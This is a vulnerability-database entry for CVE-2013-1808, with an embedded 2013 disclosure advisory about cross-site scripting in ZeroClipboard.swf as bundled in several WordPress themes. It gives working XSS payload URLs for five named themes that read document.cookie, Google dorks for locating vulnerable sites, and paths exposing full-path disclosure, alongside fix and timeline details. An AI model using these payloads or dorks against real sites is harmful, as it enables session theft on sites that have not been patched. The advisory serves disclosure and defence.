ZeroClipboard ‘ZeroClipboard10.swf’跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1168940 漏洞类型 跨站脚本
发布时间 2013-03-02 更新时间 2015-03-19
CVE编号 CVE-2013-1808 CNNVD-ID CNNVD-201303-038
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/58257
https://cxsecurity.com/issue/WLB-2013040066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201303-038
|漏洞详情
em-shorty,RepRapCalculator,Fulcrum,Django,aCMS以及其他产品中使用的ZeroClipboard1.0.8之前版本中的ZeroClipboard.swf和ZeroClipboard10.swf中存在跨站脚本漏洞。通过‘id’参数,远程攻击者利用该漏洞注入任意web脚本或HTML。
|漏洞EXP
Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in 
multiple themes for WordPress (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in 
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote 
that this is very widespread flash-file and it's placed at tens of thousands 
of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in 
February, I've published last month two new advisories (which I prepared in 
February). About vulnerabilities in WP plugins and in WP themes (with 
ZeroClipboard.swf).

This flash-file is used in hundreds of themes for WordPress (including 
custom themes for different sites). Among them are Montezuma, Striking, 
Couponpress, Azolla, Black and White. And there are many other vulnerable 
themes for WP with ZeroClipboard.swf. Also there is one theme which also 
contains ZeroClipboard10.swf.

SecurityVulns ID: 12910
CVE: CVE-2013-1808

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications (WordPress themes) with 
ZeroClipboard:

All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.

Both XSS vulnerabilities in ZeroClipboard are fixed in the last version 
ZeroClipboard 1.1.7. All developers should update swf-file in their 
software. I wrote about developers who begun fixing these vulnerabilities in 
ZeroClipboard in their software 
(http://seclists.org/fulldisclosure/2013/Mar/207).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described 
in previous advisory).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is very widespread flash-file (both versions), as you can find out via 
Google dorks. If at searching by standard Goolge dork it's possible to find 
tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then 
at searching for themes for WordPress it's possible to find hundreds 
thousand of sites with these flash-files.

inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in 
February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now 
more)

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and 
others), which is typically for WP themes.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

------------
Timeline:
------------ 

2013.02.19 - after contacting with old and new developers of ZeroClipboard, 
I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about 
vulnerabilities in different web applications with ZeroClipboard to draw 
more attention to this issue concerned with hundreds of web applications.
2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at 
my site (http://websecurity.com.ua/6401/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

|参考资料

来源:github.com
链接:https://github.com/jonrohan/ZeroClipboard/commit/a0e02933f5f7ce5f364fbad36a005f0a349f0696
来源:github.com
链接:https://github.com/jonrohan/ZeroClipboard/blob/master/docs/releases.md#zeroclipboard-108
来源:BID
名称:58257
链接:http://www.securityfocus.com/bid/58257
来源:MLIST
名称:[oss-security]20130326Re:WordPresspluginsvulnerabletoCVE-2013-1808
链接:http://www.openwall.com/lists/oss-security/2013/03/26/8
来源:MLIST
名称:[oss-security]20130324XSSvulnerabilitiesinZeroClipboardandmultiplewebapplications
链接:http://www.openwall.com/lists/oss-security/2013/03/25/1
来源:MLIST
名称:[oss-security]20130310WordPresspluginsvulnerabletoCVE-2013-1808
链接:http://www.openwall.com/lists/oss-security/2013/03/10/2
来源:MLIST
名称:[oss-security]20130302Re:[Full-disclosure]XSSvulnerabilitiesinem-shorty,RepRapCalculator,Fulcrum,DjangoandaCMS-ZeroClipboard.swf
链接:http://www.openwall.com/lists/oss-security/2013/03/03/3
来源:securityvulns.ru
链接:http://securityvulns.ru/docs29105.html
来源:securityvulns.ru
链接:http://securityvu